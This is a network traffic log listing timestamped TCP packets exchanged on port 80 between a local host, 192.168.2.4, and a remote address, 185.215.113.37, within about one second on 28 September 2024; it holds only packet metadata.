Sep 28, 2024 07:32:11.215044975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.215054989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.215065002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.215074062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.215075016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.215085983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.215094090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.215096951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.215107918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.215117931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.215120077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.215127945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.215131044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.215138912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.215147972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.215153933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.215158939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.215162992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.215171099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.215183020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.215192080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.215212107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.215238094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.215810061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.215821981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.215851068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.215872049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.297764063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.297785997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.297796011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.297882080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.297913074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.297924995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.297950029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.297974110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.297991037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.298079014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298089981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298094988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298105001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298115015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298132896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.298162937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.298326969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298337936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298347950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298357964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298368931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298369884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.298393965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.298423052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.298618078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298629045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298638105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298648119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298657894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298659086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.298676014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298698902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.298722029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.298871040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298882008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298891068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298902035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298908949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.298913956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298938036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298938036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.298949003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298959017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298960924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.298969984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298983097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298993111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.298995972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.299005032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.299021006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.299032927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.299570084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.299582005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.299592018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.299602985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.299612999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.299623013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.299633026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.299642086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.299647093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.299657106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.299669981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.299827099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.300040960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.300054073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.300064087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.300086021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.300127029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.300157070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.300168991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.300184965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.300194025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.300195932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.300204039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.300214052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.300224066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.300228119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.300235033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.300252914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.300263882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.300266981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.300273895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.300277948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.300286055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.300292015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.300297976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.300311089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.300323009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.300323963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.300348997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.300363064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.301090956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.301103115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.301112890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.301122904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.301134109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.301142931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.301148891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.301153898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.301165104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.301175117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.301176071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.301186085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.301189899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.301198006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.301208019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.301213026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.301218987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.301230907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.301243067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.301246881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.301258087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.301259995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.301269054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.301279068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.301287889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.301301003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.301323891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.302009106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302018881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302028894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302038908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302048922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302057981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302061081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.302067995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302073002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.302078962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302089930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302095890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.302100897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302112103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302118063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.302123070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302129030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.302136898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302148104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302158117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302167892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302170992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.302177906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302189112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302198887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302201986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.302226067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.302237034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.302939892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302951097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302959919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302970886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302980900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302990913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.302994013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.303002119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.303013086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.303020000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.303024054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.303030968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.303035975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.303047895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.303050995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.303059101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.303069115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.303078890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.303078890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.303092003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.303107977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.303124905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.385437965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.385468960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.385478973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.385493994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.385514975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.385526896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.385564089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.385575056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.385598898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.385612965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.385709047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.385720968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.385730028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.385740042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.385746002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.385752916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.385776997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.385796070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.385937929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.385955095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.385972977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.385999918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.386075974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386086941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386096954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386106968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386112928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.386117935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386128902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386137009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.386161089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.386420012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386430979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386440992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386451006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386461020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386471033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386471033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.386481047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386490107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386492968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.386499882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386512041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386512041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.386529922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386537075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.386557102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.386578083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.386842012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386852026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386862040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.386888027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.386907101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.387089014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387104034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387114048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387124062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387134075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387134075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.387145042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387155056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387162924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.387166023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387176991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387187958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387188911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.387198925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387204885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.387209892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387222052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387229919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.387229919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387243032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387254953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.387284994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.387903929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387914896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387924910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387934923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387944937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387950897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.387954950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387967110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387976885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387985945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.387986898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.387998104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388009071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388016939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.388019085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388031006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388036966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.388041019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388052940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388058901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.388062954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388075113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388082027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.388086081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388097048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388115883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.388127089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.388847113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388859034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388869047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388878107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388887882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388896942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.388897896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388910055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388921022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388927937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.388931036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388942003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388951063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388951063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.388962030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388977051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.388978004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.388988018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.388989925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.389002085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.389010906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.389041901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.389507055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.389518023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.389527082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.389538050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.389548063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.389554024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.389559031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.389569998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.389575958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.389580011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.389591932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.389599085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.389601946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.389614105 CEST	80	49730	185.215.113.37	192.168.2.4
